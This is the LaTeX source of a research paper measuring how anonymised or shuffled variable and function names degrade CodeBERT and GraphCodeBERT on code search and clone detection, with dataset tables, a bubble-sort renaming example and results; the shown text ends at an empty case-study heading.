\documentclass[10pt,conference,compsocconf,romanappendices]{IEEEtran}% 
\usepackage{times}
\usepackage{authblk}
\usepackage{mathrsfs}
\usepackage{amsmath,amsthm,amssymb,amsfonts,latexsym}
\usepackage{tablefootnote}
\usepackage[numbers]{natbib}

\usepackage{algorithmic,algorithm}
\usepackage{adjustbox}
\usepackage{multirow}
\usepackage{threeparttable}
\usepackage{array}
\usepackage{graphicx,color}
\usepackage{listings}
\usepackage[labelfont=bf,font=small,skip=5pt]{caption}
\usepackage{pifont}
\usepackage{url}
\usepackage{array}
\usepackage{float}
\usepackage{framed}
\usepackage{soul}

\usepackage[dvipsnames]{xcolor}

\usepackage{enumitem}
\usepackage{mathtools}
\usepackage{cuted}
\usepackage{stackengine}
\usepackage{booktabs}
\usepackage{diagbox}
\usepackage{tikz}
\usetikzlibrary{positioning}
\usetikzlibrary{decorations.pathreplacing}
\usetikzlibrary{patterns}
\usepackage{xspace}
\usepackage[utf8]{inputenc}
\usepackage{pifont}% http://ctan.org/pkg/pifont
\usepackage{sidecap}
\usepackage{subcaption}
\usepackage{fancybox}
\usepackage{balance}
\usepackage{hyperref}

\usepackage{xparse}
\usepackage{lipsum}

\tikzset{chatstyle/.style={text width=3.2in,rounded corners=2pt}}

\definecolor{mygreen}{HTML}{5fedb7}
\definecolor{lightgray}{HTML}{b6b8b7}
\definecolor{shadecolor}{gray}{0.9}

\definecolor{tablegray}{gray}{0.9}

\usepackage{xstring}
\newcommand{\mypara}[1]{
\vspace{.3em}
\noindent{\bf \IfEndWith{#1}{.}{#1}{\IfEndWith{#1}{?}{#1}{#1.}}}
}

\newcommand{\xdashrightarrow}[2][]{\ext@arrow 0359\rightarrowfill@@{#1}{#2}}
\newcounter{question}[section]
\newcounter{mydefinition}[section]
\newcommand{\ie}{\textit{i}.\textit{e}.}
\newcommand{\eg}{\textit{e}.\textit{g}.}

\usepackage{listings, xcolor}

\definecolor{verylightgray}{rgb}{.97,.97,.97}

\lstdefinelanguage{Solidity}{
	keywords=[1]{anonymous, assembly, assert, balance, break, call, callcode, case, catch, class, constant, continue, constructor, contract, debugger, default, delegatecall, delete, do, else, emit, event, experimental, export, external, false, finally, for, function, gas, if, implements, import, in, indexed, instanceof, interface, internal, is, length, library, log0, log1, log2, log3, log4, memory, modifier, new, payable, pragma, private, protected, public, pure, push, require, return, returns, revert, selfdestruct, send, solidity, storage, struct, suicide, super, switch, then, this, throw, transfer, allowance, transferFrom, true, try, typeof, using, value, view, while, with, addmod, ecrecover, keccak256, mulmod, ripemd160, sha256, sha3}, % generic keywords including crypto operations
	keywordstyle=[1]\color{blue}\bfseries,
	keywords=[2]{address, bool, byte, bytes, bytes1, bytes2, bytes3, bytes4, bytes5, bytes6, bytes7, bytes8, bytes9, bytes10, bytes11, bytes12, bytes13, bytes14, bytes15, bytes16, bytes17, bytes18, bytes19, bytes20, bytes21, bytes22, bytes23, bytes24, bytes25, bytes26, bytes27, bytes28, bytes29, bytes30, bytes31, bytes32, enum, int, int8, int16, int24, int32, int40, int48, int56, int64, int72, int80, int88, int96, int104, int112, int120, int128, int136, int144, int152, int160, int168, int176, int184, int192, int200, int208, int216, int224, int232, int240, int248, int256, mapping, string, uint, uint8, uint16, uint24, uint32, uint40, uint48, uint56, uint64, uint72, uint80, uint88, uint96, uint104, uint112, uint120, uint128, uint136, uint144, uint152, uint160, uint168, uint176, uint184, uint192, uint200, uint208, uint216, uint224, uint232, uint240, uint248, uint256, var, void, ether, finney, szabo, wei, days, hours, minutes, seconds, weeks, years},	% types; money and time units
	keywordstyle=[2]\color{teal}\bfseries,
	keywords=[3]{block, blockhash, coinbase, difficulty, gaslimit, number, timestamp, msg, data, gas, sender, sig, value, now, tx, gasprice, origin},	% environment variables
	keywordstyle=[3]\color{violet}\bfseries,
	identifierstyle=\color{black},
	sensitive=true,
	comment=[l]{//},
	morecomment=[s]{/*}{*/},
	commentstyle=\color{gray}\ttfamily,
	stringstyle=\color{red}\ttfamily,
	morestring=[b]',
	morestring=[b]"
}

\definecolor{bittersweet}{rgb}{1.0, 0.44, 0.37}
\definecolor{bleudefrance}{rgb}{0.19, 0.55, 0.91}

\makeatletter
\newcommand{\setword}[2]{%
  \phantomsection
  #1\def\@currentlabel{\unexpanded{#1}}\label{#2}%
}

\usepackage{relsize}

\newcommand{\cc}[1]{\mbox{\smaller[0.5]\texttt{#1}}}

\definecolor{dkgreen}{rgb}{0,0.6,0}
\definecolor{gray}{rgb}{0.5,0.5,0.5}
\definecolor{mauve}{rgb}{0.58,0,0.82}
\definecolor{mygray}{gray}{0.9}
\colorlet{lightblue}{blue!70}
\colorlet{lightred}{red!70}

\newcommand{\squishlist}{
\begin{itemize}[noitemsep,nolistsep]
  \setlength{\itemsep}{-0pt}
}
\newcommand{\squishend}{
  \end{itemize}
}

\usepackage{url}

\theoremstyle{definition}
\newtheorem{definition}{Definition}

\theoremstyle{definition}

\theoremstyle{definition}

\theoremstyle{definition}

\theoremstyle{definition}

\lstdefinestyle{mycstyle}{
  language=C,
  frame=tb,
  basicstyle={\scriptsize \ttfamily}, %\scriptsize,\ttfamily,%
  tabsize=2,
  breaklines=true,
  showstringspaces=false,
  numbers=left,
  numbersep=-2pt,                     % where to put the line-numbers
  numberstyle=\tiny\color{darkgray},
  escapeinside={(*}{*)},
  xleftmargin=2pt,
  stringstyle=\color{mauve},
  keywordstyle=\color{blue},
  commentstyle=\color{dkgreen} \textit,%\scriptsize \textit,
  emphstyle={\color{lightred}},
}

\lstdefinelanguage
   [x64]{Assembler}     % add a "x64" dialect of Assembler
   [x86masm]{Assembler} % based on the "x86masm" dialect
   {morekeywords={CDQE,CQO,CMPSQ,CMPXCHG16B,JRCXZ,LODSQ,MOVSXD, %
                  POPFQ,PUSHFQ,SCASQ,STOSQ,IRETQ,RDTSCP,SWAPGS, %
                  rax,rdx,rcx,rbx,rsi,rdi,rsp,rbp, %
                  r8,r8d,r8w,r8b,r9,r9d,r9w,r9b, %
                  r10,r10d,r10w,r10b,r11,r11d,r11w,r11b, %
                  r12,r12d,r12w,r12b,r13,r13d,r13w,r13b, %
                  r14,r14d,r14w,r14b,r15,r15d,r15w,r15b}} % etc.

\date{}
\title{\LARGE How Does Naming Affect LLMs on Code Analysis Tasks?}
\author[1]{Zhilong Wang\thanks{Corresponding author:~zzw169@psu.edu}}
\author[1]{Lan Zhang}
\author[1]{Chen Cao}
\author[1]{Nanqing Luo}
\author[2]{Xinzhi Luo}
\author[1]{Peng Liu}
\affil[1]{College of Information Science and Technology, The Pennsylvania State University}
\affil[2]{Heinz College, Carnegie Mellon University}

\begin{document}

\maketitle

\begin{abstract}
The Large Language Models (LLMs), such as GPT and BERT, were proposed for natural language processing (NLP) and have shown promising results as general-purpose language models. An increasing number of industry professionals and researchers are adopting LLMs for program analysis tasks. However, one significant difference between programming languages and natural languages is that a programmer has the flexibility to assign any names to variables, methods, and functions in the program, whereas a natural language writer does not. Intuitively, the quality of naming in a program affects the performance of LLMs in program analysis tasks. This paper investigates how naming affects LLMs on code analysis tasks. Specifically, we create a set of datasets with code containing nonsense or misleading names for variables, methods, and functions, respectively. We then use well-trained models (CodeBERT) to perform code analysis tasks on these datasets. The experimental results show that naming has a significant impact on the performance of code analysis tasks based on LLMs, indicating that code representation learning based on LLMs heavily relies on well-defined names in code. Additionally, we conduct a case study on some special code analysis tasks using GPT, providing further insights.
\end{abstract}

% \begin{IEEEkeywords}
% encryption detection, ransomware, loop detection, k complexity, data flow analysis, graph neural network
% \end{IEEEkeywords}
% no keywords
% \keywords{large language model, ChatGPT, CodeBERT, code analysis, security analysis}
% \vspace{-0.5em}
\section{Introduction}
\label{sec:intro}
Deep learning has demonstrated its significant learning ability in natural language processing (NLP). To deploy a natural language task, such as translation and text classification, researchers first pre-train a model to embed words into vectors using ELMo~\cite{sarzynska2021detecting}, GPT~\cite{radford2018improving}, and BERT~\cite{devlin2018bert}. These pre-trained models are initially trained on a large unsupervised text corpus and then fine-tuned on different downstream tasks. Such models are called large language models (LLMs) due to their relatively large number of model parameters. These LLMs have been deployed to the source code to learn program representations. Similar to natural language, the program representation learned from the source code using pre-trained models can be applied to several downstream program analysis tasks.

In 2020, \citeauthor{feng2020codebert} proposed a pre-trained model called CodeBERT~\cite{feng2020codebert}, based on Bidirectional Encoder Representations from Transformers (BERT), that learns general-purpose representations to support downstream NL-PL applications such as natural language code search, code documentation generation, and more. In 2021, \citeauthor{guo2020graphcodebert} proposed a new pre-trained model, GraphCodeBERT~\cite{guo2020graphcodebert}, which improves CodeBERT by enabling the model to capture more program semantic information, such as data flow. Recently, researchers have adopted ChatGPT for various code analysis tasks, such as code refinement~\cite{guo2024exploring}, vulnerability discovery~\cite{chen2023chatgpt}, and more. In industry, GitHub Copilot~\cite{copilot}, powered by GPT, assists developers by suggesting code snippets, completing functions, and providing contextual code recommendations directly within Integrated Development Environments.

The difference between natural language and programming language leads to unintended consequences if these NLP models are directly applied to programming language. In natural language, the meaning of a word is deterministic in a specific context, whereas in programming language, a programmer can assign any string to any variable, method, or function as their names. In such cases, most strings in the code could be replaced by other words and may not carry meaningful information. If a large language model still heavily relies on the literal meaning of a variable, method, or function name, it may encounter problems when the assigned name does not contain useful information or has a controversial meaning.

Furthermore, a limited number of words are used in natural language, while in programming language, the number of words can be unlimited because a programmer can casually create a string to name a variable, regardless of whether the created string is interpretable. Therefore, it is doubtful whether the word embedding adopted in natural language is still efficient for solving program analysis tasks. If a model designer ignores the numerous differences between natural language and programming language and naively adopts methods from NLP, the designed model may suffer from the above limitations.

In this paper, we propose a taxonomy that groups features in programming languages into two categories: literal features and logical features. We aim to investigate how these different types of features affect the performance of current pre-trained models in downstream tasks and to what extent they influence the results. Specifically, to achieve this goal, we create eight types of datasets that mask off different types of features to quantitatively measure their impact. In each dataset, either variable names or method/function names are replaced with nonsense or misleading names. We then use well-trained models (CodeBERT) to perform two code analysis tasks on these created datasets and measure the impact of naming on the model's performance.

Based on the experimental results, we find that naming strategies have a significant impact on the performance of code analysis tasks based on LLMs, indicating that code representation learning heavily relies on well-defined names in code. Our experiments with CodeBERT reveal the extent to which literal and logical features impact performance. While these models exhibit remarkable capabilities, their effectiveness can be influenced by unreliable features in the analyzed code. Instances such as code generated from decompilation~\cite{katz2018using} or non-conventional code naming~\cite{butler2015investigating} might yield reduced accuracy, as LLMs' generalization ability is limited to the patterns and examples present in their training data.

Additionally, since ChatGPT is a conversational large language model that can provide intuitive feedback, we conduct a case study to investigate the pre-trained model's ability to comprehend programming language in specific settings.

% \section{Background}
\section{Background}
\label{sec:back}

\subsection{LLMs}
CodeBERT and GraphCodeBERT~\cite{feng2020codebert,guo2020graphcodebert} are based on the Transformer architecture and learn code representations through self-supervised training tasks, such as masked language modeling and structure-aware tasks, using a large-scale unlabeled corpus. Specifically, CodeBERT is pre-trained over six programming languages (Python, Java, JavaScript, PHP, Ruby, and Go) and is designed to accomplish three main tasks: masked language modeling, code structure edge prediction, and representation alignment. By mastering these tasks, CodeBERT can comprehend and represent the underlying semantics of code, empowering security researchers with a powerful tool for source code analysis and protection. The pre-trained models have been applied to several downstream program analysis tasks: code search, clone detection, code translation, and code refinement.

ChatGPT~\cite{chatgptlimitation}, an AI chatbot developed by OpenAI and launched in November 2022, has garnered significant attention for its impressive capabilities. With the ability to respond to diverse prompts, ranging from answering questions in various fields to generating custom essays, people are truly astonished by its prowess. Researchers and users alike are intrigued by ChatGPT's potential to address questions across multiple domains, and they are keen to observe how its application may evolve in different areas. Recently, there has been research adopting ChatGPT for various code analysis tasks, such as code refinement~\cite{guo2024exploring}, vulnerability discovery~\cite{chen2023chatgpt}, and more.

%\input{sections/preliminary}
% \vspace{-0.5em}
% \section{Quantitative Analysis on CodeBert}
% The previous section has explored the ChatGPT's strengths, potential, and limitation in solve some code analysis tasks.
% In this section, we shift our attention from the ChatGPT to the CodeBert. 

% {\color{red} Code Search: Given a natural language as the input, the objec- tive of code search is to find the most semantically related code from a collection of codes. We conduct experiments on the CodeSearchNet corpus (Husain et al., 2019) }

% {\color{blue} \url{https://arxiv.org/pdf/2002.08155} \url{https://arxiv.org/pdf/2009.08366}}

% \url{https://arxiv.org/pdf/1909.09436}
% \url{https://arxiv.org/pdf/2301.08427v2}

% {\color{yellow} https://aisec.cc/}

\section{Terminology: Literal Features and Logic Features}

A source code file of a program consists of a sequence of tokens. These tokens can be grouped into three categories: keywords, operators (both defined in the programming language specification), and user-defined names.

Keywords are reserved words that have special meanings and purposes and can only be used for specific purposes. For example, for, if, and break are widely known keywords used in many programming languages. They are used in a program to change the control flow. A programming language usually contains only a limited number of keywords. For example, the C programming language contains 32 keywords, and Python 3.7 contains 35 keywords.

In addition to keywords, a programming language needs to define a set of operators. For example, arithmetic operators (e.g., +, -, and *) and logical operators (e.g., and, or, and not) are two of the most important categories. Keywords and operators are defined by a programming language.

In addition, a programmer needs to define some tokens (i.e., names) to represent variables, structures, functions, methods, classes, and packages. When programmers write a code snippet, they can randomly choose any string to name these elements as long as the string does not conflict with reserved keywords and operators and follows the programming language specification. However, programmers have limited flexibility in choosing the keywords and operators. Only some keywords (such as for and while) and operators (such as ++, +1) are interchangeable. Thus, the program logic is fixed when using a set of keywords and operators in a program. In contrast, the names of variables, functions, or classes have no impact on the logic of the program.

\begin{definition}(Literal Features and Logical Features). 
    Given a piece of code, the \textbf{literal features} are features of the literal meaning of the variable names, function names, and programmer-readable annotation. These features could be removed without changing the functionality of the code. The \textbf{logical features} are features that control the program logic. The keywords and operators defined by a programming language specification are logical features.
\end{definition}

\section{Methodology}
Currently, GraphCodeBERT takes code snippets of functions or class methods as data samples. It tokenizes keywords, operators, and developer-defined names from the code snippets and utilizes a Transformer to learn the data flow of the source code in the pre-training stage. Within a function or a method, developer-defined names can be grouped into three categories: 1) variable names, 2) method names, and 3) method invocation names. The program logic is not affected if we map these developer-defined names to other strings in the same namespace.

Since the pre-trained CodeBERT and GraphCodeBERT models, along with the datasets~\cite{trainedcodebert} for downstream tasks, are publicly available for download and use, we are able to conduct focused experiments to evaluate them. Here, we will conduct the evaluation based on two downstream tasks: natural language code search and clone detection.

The goal of code search is to find the code snippet that is most semantically relevant to a given natural language query from a collection of code. This reflects an LLM's ability to understand a specific function and map its intended purpose to the relevant code portion within the entire program.

Code clone detection aims to identify and measure the similarity between different code fragments, determining if they produce the same results when given the same input. This indicates whether an LLM's understanding has reached a level where it can mimic the code execution process and comprehend the logic flow.

We did not choose other downstream tasks because code refinement adopts an abstract representation and code translation involves two programming languages, which introduces challenges in uniformly anonymizing user-defined names. Since our experiments focus on the learning ability of pre-trained models on literal and other semantic features, and the downstream tasks are only used to evaluate the effectiveness of the pre-trained model, we believe that any reasonable downstream task should be appropriate.

\subsection{Dataset}

\begin{table}[t!]%htpb!
    \setlength{\tabcolsep}{4pt}
  \centering
  \begin{threeparttable}
  \captionsetup{justification=centering}
  \scriptsize
  \caption{Newly Created Dataset for Our Experiments.}
  \label{tab:anonymize}
  \begin{tabular}{cccp{0.3cm}<{\centering}p{0.3cm}<{\centering}p{0.3cm}<{\centering}p{0.6cm}<{\centering}c}
  \toprule
%   {\bf Lang-} & \multirow{2}{*}{\bf Orig.}  & \multirow{2}{*}{\bf Anon.} &  {\bf w/o } & {\bf w/o }  & {\bf w/o} & \multirow{2}{*}{\bf All} \\
   & {\bf Task} & {\bf Language} & {\bf Var.}~\tnote{1} & {\bf Def.} & {\bf Inv.} & {\bf Anon.}~\tnote{2} & {\bf Size} \\
  \midrule
  {$\mathcal{D}$1} &  CodeSearch & Java\&Python &  \ding{51} & \ding{55} &  \ding{55} & Rand.  & 175,878 \& 266,738~\tnote{3} \\
  \midrule
  {$\mathcal{D}$2} &  CodeSearch & Java\&Python &  \ding{51} & \ding{55} &  \ding{55} & Shuff. & 175,878 \& 266,738 \\
  \midrule
  {$\mathcal{D}$3} & CodeSearch & Java\&Python&  \ding{55} & \ding{51} &  \ding{55} & Rand. & 175,878 \& 266,738 \\
  \midrule
  {$\mathcal{D}$4} & CodeSearch & Java\&Python&  \ding{55} & \ding{51} &  \ding{55} & Shuff. & 175,878 \& 266,738 \\
  \midrule
  {$\mathcal{D}$5} & CodeSearch & Java\&Python&  \ding{55} & \ding{55} &  \ding{51} & Rand. & 175,878 \& 266,738 \\
  \midrule
  {$\mathcal{D}$6} & CodeSearch & Java\&Python&  \ding{55} & \ding{55} &  \ding{51} & Shuff. & 175,878 \& 266,738 \\
  \midrule
  {$\mathcal{D}$7} & CodeSearch & Java\&Python&  \ding{51} & \ding{51} &  \ding{51} & Rand. & 175,878 \& 266,738 \\
  \midrule
  {$\mathcal{D}$8} & CodeSearch & Java\&Python&  \ding{51} & \ding{51} &  \ding{51} & Shuff. & 175,878 \& 266,738 \\
  \midrule
  {$\mathcal{D}$9} & CloneDete. & Java&  \ding{51} & \ding{55} &  \ding{55} & Rand. & 1316,444 \\
  \midrule
  {$\mathcal{D}$10} & CloneDete. & Java&  \ding{51} & \ding{55} &  \ding{55} & Shuff. & 1316,444 \\
  \midrule
  {$\mathcal{D}$11} & CloneDete. & Java&  \ding{55} & \ding{51} &  \ding{55} & Rand. & 1316,444 \\
  \midrule
  {$\mathcal{D}$12} & CloneDete. & Java&  \ding{55} & \ding{51} &  \ding{55} & Shuff. & 1316,444 \\
  \midrule
  {$\mathcal{D}$13} & CloneDete. & Java&  \ding{55} & \ding{55} &  \ding{51} & Rand. & 1316,444 \\
  \midrule
  {$\mathcal{D}$14} & CloneDete. & Java&  \ding{55} & \ding{55} &  \ding{51} & Shuff. & 1316,444 \\
  \midrule
  {$\mathcal{D}$15} & CloneDete. & Java&  \ding{51} & \ding{51} &  \ding{51} & Rand. & 1316,444 \\
  \midrule
  {$\mathcal{D}$16} & CloneDete. & Java&  \ding{51} & \ding{51} &  \ding{51} & Shuff. & 1316,444 \\
  \midrule
%   \multirow{2}{0.5cm}{Java}  & \multirow{2}{0.5cm}{70.36\%} & Random  & 67.73\% & 60.89\% & 69.84\% & 17.42\% \\
%   & &  Meaningful & 67.14\%	& 58.36\% &	69.84\% &	17.03\% \\
%   \midrule
%   \multirow{2}{0.5cm}{Python}  & \multirow{2}{0.5cm}{68.17\%}  & Random  &  59.8\% & 55.43\% & 65.61\% & 24.09\% \\
%   & & Meaningful& 59.78\% &	55.65\% &	65.61\% &	23.73\%  \\
  \bottomrule
\end{tabular}
  \begin{tablenotes}
    \scriptsize
    \item[1] {\bf Var.} {\bf Def.}, and {\bf Inv.} represent that the variable names, method/function definition names, and the method/function invocation names are anonymized. 
    \item[2] Anonymized methods: randomly-generated or shuffling. 
    \item[3] Two numbers are the sizes of data samples corresponding two languages. 
  \end{tablenotes}
\end{threeparttable}
\end{table}

Then, we retrain the existing models and evaluate their performance on the two downstream tasks: natural language code search and clone detection. For the code search task, we used the test portion from the CodeSearchNet corpus collection~\cite{husain2019codesearchnet}. This dataset, derived from publicly available open-source non-fork GitHub repositories and their associated documentation, provides code-text pairs for various code search challenges in both Java and Python. The testing dataset for the clone detection task is based on the BigCloneBench dataset~\cite{svajlenko2014towards}, which provides a benchmark built from verified clones of ten common functionalities in different inter-project Java repositories.

Based on the datasets for these two tasks, we generate three types of datasets that anonymize three types of literal features in the code: variable names, method/function definition names, and method/function invocation names. Additionally, we create another type of dataset that anonymizes all three types of features together.

\begin{enumerate}
    \item In the first type of datasets, we anonymize the variable names. An example is the change from \texttt{it\_end} to \texttt{var3} and \texttt{finished} to \texttt{var4} between \autoref{code:goodname} and \autoref{code:badname}. 
    \item In the second type of datasets, we anonymize the method/function names. An example is the change from \texttt{bubble\_sort} to \texttt{fun1} between \autoref{code:goodname} and \autoref{code:badname}. 
    \item In the third type of datasets, we anonymize the method/function invocation names. An example is the change from \texttt{pred} to \texttt{fun2} between \autoref{code:goodname} and \autoref{code:badname}. 
    \item The last type of datasets are a combination of the three types of anonymization, which anonymize all three kinds of developer-defined names. 
\end{enumerate}

\lstset{style=mycstyle}
\begin{lstlisting}[language=C++,
emph={bubble_sort, begin, end, pred, it_end, finished, next, it},
label={code:goodname},caption={A piece of code with meaningful variable/function names.}, captionpos=b]{}
    void bubble_sort(It begin, It end, Pred pred=Pred()){
        if ( std::distance( begin, end ) <= 1 ){ return; }
        auto it_end    = end;
        bool finished  = false;
        while ( !finished ){ //loop stop when no adjacent elements are not in required order. 
            finished = true;
            std::advance( it_end, -1 );
            for (auto it = begin; it! = it_end; ++ it ){
                auto next = detail::advance( it, 1 );
                if (pred( * next, * it)){
                    std::swap( * it, * next);
                    finished = false;
                }
            }
        }   
    }
\end{lstlisting}
\begin{lstlisting}[language=C++,
emph={var1, var2, var3, var4, var5, var6, fun1, fun2, fun2},
emphstyle=\color{purple}\ttfamily\scriptsize,
label={code:badname},caption={The same code without meaningful variable/function names.}, captionpos=b]{}
    void fun1(It var1, It var2, Pred fun2=Fun2()){
        if ( std::distance( var1, var2 ) <= 1 ){ return; }
        auto var3  = var2;
        bool var4  = false;
        while ( !var4 ){
            var4 = true;
            std::advance( var3, -1 );
            for (auto var5 = var1; var5! = var3; ++ var5 ){
                auto var6 = detail::advance( var5, 1 );
                if (fun2( * var6, * var5)){
                    std::swap( * var5, * var6);
                    var4 = false;
                }
            }
        }   
    }
\end{lstlisting}

Besides, we adopt two strategies to anonymize the names:
The first strategy, called "randomly-generated," randomly generates strings (e.g., ``oe4yqk4cit2maq7t") without any literal meaning.
The second strategy, called "shuffling," shuffles the names in the code. In this way, the shuffled names do not reflect the intention of the variables, functions, or invocations. For example, this strategy could replace ``bubble\_sort" with ``aes\_encryption."

Based on the four types of name sets to replace and the two replacing strategies, we eventually generated 16 variants of the original dataset from \cite{guo2020graphcodebert}. The details of the 16 datasets are shown in Table~\ref{tab:anonymize}.

\subsection{Experiment Design}

\noindent\textbf{Model Training and Fine-Tuning.} 
We directly adopt the pre-trained model from GraphCodeBERT~\cite{guo2020graphcodebert}, which is pre-trained on three tasks. The first task involves masked language modeling to learn representations from the source code. The second task is data flow edge prediction, aimed at learning representations from data flow. This is achieved by initially masking some variables' data flow edges and then having GraphCodeBERT predict those edges. The final task is variable alignment between the source code and data flow, which involves predicting the locations where a variable is identified to align representations between the source code and the data flow. GraphCodeBERT includes 12 layers of Transformer with 768-dimensional hidden states and 12 attention heads.

The pre-trained model is then fine-tuned on the downstream tasks on an NVIDIA DGX-1. Specifically, we train a model for each of the 16 datasets that we have crafted by randomly selecting 80\% of the data samples as the training set and the remaining 20\% as the test set.

\noindent\textbf{Evaluation Matrix.}
We use Mean Reciprocal Rank (MRR) as our evaluation metric for the code search task, which assesses how well the model ranks the correct code snippet among 999 distractor snippets when given the documentation comment as a query. For the code clone detection task, we use the F1 score to measure the model's performance.

\begin{table}[t!]%htpb!
    \setlength{\tabcolsep}{4pt}
  \centering
  \captionsetup{justification=centering}
  \footnotesize
  \caption{{\bf Results on Code Search.} The results are shown in $\frac{MRR}{Dataset}$ format.}
  \label{tab:search}
  \begin{tabular}{lcccccc}
  \toprule
  {\bf Lang-} & \multirow{2}{*}{\bf Orig.}  & \multirow{2}{*}{\bf Anon.} &  {\bf w/o } & {\bf w/o }  & {\bf w/o} & \multirow{2}{*}{\bf All} \\
  {\bf uage}& & & {\bf Var.} & {\bf Def.} & {\bf Inv.} & \\
  \midrule
  \multirow{2}{0.5cm}{Java}  & \multirow{2}{0.7cm}{70.36\%} & Random  & $\frac{67.73\%}{\mathcal{D}1}$   & $\frac{60.89\%}{\mathcal{D}3}$ & $\frac{69.84\%} {\mathcal{D}5}$ & $\frac{17.42}{\mathcal{D}7}$ \\
  & &  Shuffling & $\frac{67.14\%}{\mathcal{D}2}$	& $\frac{58.36\%}{\mathcal{D}4}$ &	$\frac{69.84\%}{\mathcal{D}6}$ &	$\frac{17.03\%}{\mathcal{D}8}$ \\
  \midrule
  \multirow{2}{0.5cm}{Python}  & \multirow{2}{0.7cm}{68.17\%}  & Random  &  $\frac{59.8\%}{\mathcal{D}1}$  & $\frac{55.43\%}{\mathcal{D}3}$ & $\frac{65.61\%}{\mathcal{D}5}$ &$\frac{24.09\%}{\mathcal{D}7}$ \\
  & & Shuffling & $\frac{59.78\%}{\mathcal{D}2}$ &	$\frac{55.65\%}{\mathcal{D}4}$ &	$\frac{65.61\%}{\mathcal{D}6}$ &	$\frac{23.73\%}{\mathcal{D}8}$  \\
  \bottomrule
\end{tabular}
\end{table}

\begin{table}[t!]%htpb!
  \setlength{\tabcolsep}{4pt}
  \centering
  \captionsetup{justification=centering}
  \footnotesize
  \caption{{\bf Results on Clone Detection.} The results are shown in $\frac{F1}{Dataset}$ format.}
  \label{tab:clone}
  \begin{tabular}{ccccccc}
  \toprule
  {\bf Lang-} & \multirow{2}{*}{\bf Orig.}  & \multirow{2}{*}{\bf Anon.} &  {\bf w/o } & {\bf w/o }  & {\bf w/o} & \multirow{2}{*}{\bf All} \\
  {\bf uage}& & & {\bf Var.} & {\bf Def.} & {\bf Inv.} & \\
  \midrule
  \multirow{2}{0.5cm}{Java}  & \multirow{2}{0.7cm}{94.87\%} & Random & $\frac{92.64\%}{\mathcal{D}9}$& $\frac{93.97\%}{\mathcal{D}11}$ & $\frac{94.72\%}{\mathcal{D}13}$ & $\frac{86.77\%}{\mathcal{D}15}$ \\
  & & Shuffling & $\frac{92.52\%}{\mathcal{D}10}$ &	$\frac{94.27\%}{\mathcal{D}12}$ &	$\frac{93.67\%}{\mathcal{D}14}$ &	$\frac{84.76\%}{\mathcal{D}16}$ \\
  \bottomrule
\end{tabular}
\end{table}

\subsection{Experiment Results}
Table~\ref{tab:search} and Table~\ref{tab:clone} show the experiment results (MRR or F1 score) on the downstream tasks of code search and code clone detection, respectively. The second column shows the model performance reported in the original paper~\cite{guo2020graphcodebert}. The third column indicates the anonymization methods adopted.

The fourth, fifth, and sixth columns display the model performance when anonymizing different parts of the code: variable names, method/function definition names, and method/function invocation names, respectively. The last column shows the model performance when anonymizing all three types of names together. To associate the results with the corresponding datasets in Table~\ref{tab:anonymize}, we provide not only the model performance but also the dataset numbers that were trained and tested on.

\subsection{Analysis and Discussion}

The results show that anonymizing variable names, method/function definition names, and method/function invocation names leads to a significant decline in model performance, regardless of whether we replace developer-defined names with ``randomly-generated" strings or ``shuffling" strings. Additionally, on average, datasets with ``shuffling" strings perform worse than those with randomly-generated strings, suggesting that ``shuffling" strings can mislead the models.

In terms of method/function names, anonymizing method/function definition names results in more significant degradation than anonymizing method/function invocation names, especially in code search tasks. This indicates that method/function definition names often strongly correlate with the overall function goal in most scenarios within the training dataset. Trained LLMs tend to infer a correlation between the method/function name and its actual purpose when tasked with code search. This predictability stems from open-source program datasets, which are well-organized and intended to be user-readable, unlike malware or commercial applications that obscure their true purpose from users. As for method/function invocation names, their impact is less pronounced because they operate within the function scope and influence only part of the function logic, similar to variable names. As shown in the results table, the score for changes in method/function invocation names is closer to changes in variable names than changes in method/function definition names.

As for different programming languages, we can discern the differences in degradation from the results of the code search task. Overall, if a single attribute is anonymized but the others remain unchanged, the degradation of LLM is more significant for Python than Java. However, if all three naming attributes in the code are changed, the Java task shows the most severe degradation, leading to an MRR score as low as 17.03%.

This disparity can be attributed to several factors related to language characteristics, naming conventions, and the overall ecosystem of the two languages. Java, as a statically typed language, provides additional context through type declarations, which compensates for the loss of meaningful names. In contrast, Python, a dynamically typed language, relies more heavily on descriptive variable and function names for context and clarity, aligning with its design philosophy of readability and simplicity. Developers expect meaningful names in Python to quickly understand code functionality.

Java code often includes more boilerplate and verbosity, which can provide additional contextual clues even if names are anonymized. Moreover, the Java ecosystem's strong typing and adherence to naming conventions in frameworks and libraries ensure consistency and maintainability in large codebases. These structural and syntactical elements help mitigate the impact of partial anonymization. However, modifying all names for both variables and method/functions in Java code disrupts these patterns, significantly impairing the LLM's ability to understand the code. 

Similarly, in Python, anonymizing all three types of names led to a score as low as 23.73\%, indicating that Python's reliance on descriptive naming for understanding is also critical. The combination of these factors underscores the challenges in adapting LLMs effectively to programming languages, necessitating models that can handle both literal and logical features to enhance performance in code analysis tasks.

Compared to the clone detection task, the performance degradation is more pronounced in the code search task. This difference arises from the inherent goals of the tasks: code search involves mapping a natural language description to a code block, while clone detection focuses solely on comparing code fragments.

In code search tasks, well-defined variable and method/function names are crucial because they help CodeBERT relate the code snippet to its descriptive purpose. Consequently, the model relies more on the natural language elements of the code and less on its underlying logic. Conversely, code cloning typically involves copying code with slight alterations, often in the names of variables or methods/functions, to avoid plagiarism or detection. Thus, detecting code clones requires ignoring these names and focusing on the actual logic flow of the code.

This fundamental difference between the two tasks explains the varying degrees of performance degradation observed in CodeBERT during code analysis. It also indicates that CodeBERT is well-trained for code clone detection tasks, recognizing that naming conventions have minimal impact on the actual logic of the code. Therefore, there is a growing need for pre-trained models specifically tailored to programming languages rather than natural language, to enhance their effectiveness in code analysis tasks.

Overall, our experiments reflect that current source-code level representation learning methods still largely rely on the \textit{literal features} and ignore the \textit{logical features}. However, the \textit{literal features} are not always reliable, as mentioned in \autoref{sec:intro}. The current models still cannot effectively learn the logical features in the source code. Attackers can simply randomize the \textit{literal features} to mislead the CodeBERT and GraphCodeBERT models.

%The \textit{logic feature} hidden in the source code contains all the information of a piece of the program. But current models still cannot effectively learn them.  

%\subsection{Observations}
%\fixme{(remove this section?)}
%Through a set of experiments and empirical analysis, this section tries to explain the learning ability of current BERT-based source code representation learning schemes.
%The results show that CodeBERT and GraphCodeBERT are efficient to learn \textit{literal features} but less efficient to learn \textit{logic features}. 

% \vspace{-0.5em}
\section{Case Study}
